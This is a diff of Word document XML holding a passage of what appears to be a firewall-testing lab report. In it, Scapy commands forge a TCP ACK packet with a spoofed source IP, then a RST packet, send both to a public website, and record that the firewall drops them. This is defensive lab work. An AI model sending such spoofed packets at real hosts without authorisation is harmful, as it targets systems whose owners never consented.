+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>-----------#code--------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>IP(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "10.10.10.2",dst = "www.geeksforgeeks.org")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = TCP(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>dport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>80,sport</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>=1500,flags="A",</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>seq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>=111)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; p = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ans</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = sr1(p)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>analysis:  packet with a false source IP address and with ACK field bit set is dropped by the fire wall.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>te</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>2:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>setting the reset R</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">By </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">setting the reset R flags </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>we</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> confuse the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>server. (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>firewall should drop it)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F48E571" wp14:editId="55BE3DC7">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>739140</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>3860165</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4474210" cy="635"/>
+                <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+                <wp:wrapTight wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="21102"/>
+                    <wp:lineTo x="21520" y="21102"/>
+                    <wp:lineTo x="21520" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapTight>
+                <wp:docPr id="5" name="Text Box 5"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4474210" cy="635"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">1. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>A basic Ethernet and TCP</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>/</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:sz w:val="22"/>
+                              </w:rPr>
+                              <w:t>IP packet</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="5F48E571" id="Text Box 5" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:58.2pt;margin-top:303.95pt;width:352.3pt;height:.05pt;z-index:-251621376;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">1. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>A basic Ethernet and TCP</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>/</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:sz w:val="22"/>
+                        </w:rPr>
+                        <w:t>IP packet</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="tight"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="278F7A7B" wp14:editId="2091042A">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-373380</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6766560" cy="3803015"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:wrapTight wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="21531"/>
+                <wp:lineTo x="21527" y="21531"/>
+                <wp:lineTo x="21527" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapTight>
+            <wp:docPr id="4" name="Picture 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6766560" cy="3803015"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>-----------#code--------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>p.payload</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>.flags</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "R"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>ans</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = sr1(p)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>analysis: incoming packet with RESET flag set is dropped by the firewall.</w:t>
+      </w:r>
+    </w:p>
